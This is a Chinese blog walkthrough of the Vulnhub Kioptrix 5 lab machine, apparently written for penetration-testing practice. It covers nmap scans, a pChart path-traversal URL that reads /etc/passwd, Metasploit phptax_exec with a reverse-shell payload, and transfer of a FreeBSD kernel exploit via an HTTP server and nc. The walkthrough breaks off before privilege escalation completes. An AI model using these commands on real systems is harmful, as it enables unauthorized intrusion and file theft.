Kioptrix 5 渗透流程

kitha.

已于 2024-02-21 22:04:19 修改

阅读量1k

点赞数 25

分类专栏： kioptrix系列靶机渗透 Vulnhub靶机实战文章标签：网络 web安全 web 安全网络安全

于 2024-01-02 13:27:01 首次发布

本文链接：https://blog.csdn.net/braty_/article/details/135338550

版权

Vulnhub靶机实战同时被 2 个专栏收录

22 篇文章 0 订阅

订阅专栏

kioptrix系列靶机渗透

5 篇文章 0 订阅

订阅专栏

信息收集

1.存活扫描

nmap -sn 192.168.126.1/24

└─# nmap -sn 192.168.126.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-01 21:34 EST
Nmap scan report for 192.168.126.1
Host is up (0.00059s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.126.2
Host is up (0.00035s latency).
MAC Address: 00:50:56:E5:B1:08 (VMware)
Nmap scan report for 192.168.126.146  //发现靶机
Host is up (0.00091s latency).
MAC Address: 00:0C:29:2F:71:EF (VMware)
Nmap scan report for 192.168.126.254
Host is up (0.00046s latency).
MAC Address: 00:50:56:E3:46:91 (VMware)
Nmap scan report for 192.168.126.145
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.21 seconds

2.端口扫描

nmap -sT -p- 192.168.126.146

└─# nmap  -sT -p- 192.168.126.146   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-01 21:35 EST
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 81.41% done; ETC: 21:37 (0:00:20 remaining)
Nmap scan report for 192.168.126.146
Host is up (0.00080s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 00:0C:29:2F:71:EF (VMware)

3.服务扫描

nmap -sT -sV --version-all -O 192.168.126.146 -p 22,80,8080

└─# nmap -sT -sV --version-all -O 192.168.126.146 -p 22,80,8080
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-01 21:38 EST
Nmap scan report for 192.168.126.146
Host is up (0.00058s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:2F:71:EF (VMware)
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
No OS matches for host
Network Distance: 1 hop

web渗透：

访问8080：

被拒绝

访问80：

查看源码发现信息：

尝试访问：

漏洞搜索：

发现对应的脚本，版本一致，是个路径穿越漏洞

拼接url：

http://192.168.126.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

可以看到操作系统为FreeBSD 9.0，存在root权限用户root和toor，普通用户ossec，ossecm和ossecr。使用搜索引擎搜索FreeBSD系统Apache的配置文件路径，得到默认配置文件路径为：/usr/local/etc/apache22/httpd.conf

此时得到url：

http://192.168.126.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

最后面可以看到访问8080端口的agent是 Mozilla/4.0 Mozilla4_browser

我们利用 burp suite 抓包修改

再访问发现都是无用的信息：

尝试搜索 phptax的漏洞：

searchsploit phptax

└─# searchsploit phptax      
--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)                                     | php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution                                  | php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                                                 | php/webapps/21665.txt
--------------------------------------------------------------------------------------------------- ---------------------------------

找到3个poc

msf一把梭

msfconsole

use exploit/multi/http/phptax_exec

show options

set rhosts 192.168.126.146

set rport 8080

show payloads

set payload cmd/unix/reverse

set lhost 192.168.126.145

set useragent Mozilla/4.0 Mozilla4_browser

run

最终设置：

成功拿到www权限

提权：

uname -a

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

查询提权脚本：

searchsploit FreeBSD 9.0
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation                              | freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation                        | freebsd/local/26368.c
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

下载脚本：

searchsploit -m 28718.c
  Exploit: FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation
      URL: https://www.exploit-db.com/exploits/28718
     Path: /usr/share/exploitdb/exploits/freebsd/local/28718.c
    Codes: CVE-2012-0217, OSVDB-82949
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/28718.c

上传至靶机：

kali：开启http服务

┌──(root㉿kali)-[/home/kali/Desktop/k5]
└─# ls
28718.c
                                                                                                                      
┌──(root㉿kali)-[/home/kali/Desktop/k5]
└─# python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

靶机：wgt下载

。。。。靶机没装wget 尝试其他方法

nc上传：

kali：nc -lvnp 8888 <28718.c

靶机：nc -nv 192.168.126.145 8888 > 28718.c

kitha.

关注

25
点赞
踩
20

收藏

觉得还不错? 一键收藏
0
评论
Kioptrix 5 渗透流程

可以看到操作系统为FreeBSD 9.0，存在root权限用户root和toor，普通用户ossec，ossecm和ossecr。使用搜索引擎搜索FreeBSD系统Apache的配置文件路径，得到默认配置文件路径为：/usr/local/etc/apache22/httpd.conf。最后面可以看到访问8080端口的agent是 Mozilla/4.0 Mozilla4_browser。发现对应的脚本，版本一致，是个路径穿越漏洞。我们利用 burp suite 抓包修改。kali和靶机都是nat的网卡。
复制链接

扫一扫